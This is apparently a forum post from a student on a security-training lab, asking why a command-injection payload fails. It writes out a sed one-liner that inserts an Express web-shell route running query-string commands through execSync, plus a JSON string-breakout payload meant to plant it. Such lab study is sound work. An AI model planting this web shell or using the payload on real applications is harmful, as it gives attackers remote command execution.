Hello,
I’m looking for help for the Command Execution portion of this module. The task is to write a new API route into the app.js file to create a webshell.
I cannot for the life of me get this working at all locally. Without using the API, I can confirm this command works to rewrite the app.js
sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});' src/app.js
Afterwards I can run a GET request to the endpoint to read files.
Whenever I try to do it in the app, all I get are syntax errors. I’ve tried escaping, modifying the syntax, using other ways, but I can’t get it to work.
This command injection gives me this feedback
{"text":"'}) + require('child_process').execSync('sed -i '17i\app.get("/api/cmd", (req, res) => {const cmd = require("child_process").execSync(req.query.cmd).toString(); res.send(cmd);});'\" src/app.js')//
}
{“message”:“Bad escaped character in JSON at position 62 (line 1 column 63)”}
Sometimes, I can get the API to give me a normal response, but then the file isn’t overwritten at all. Very lost here.
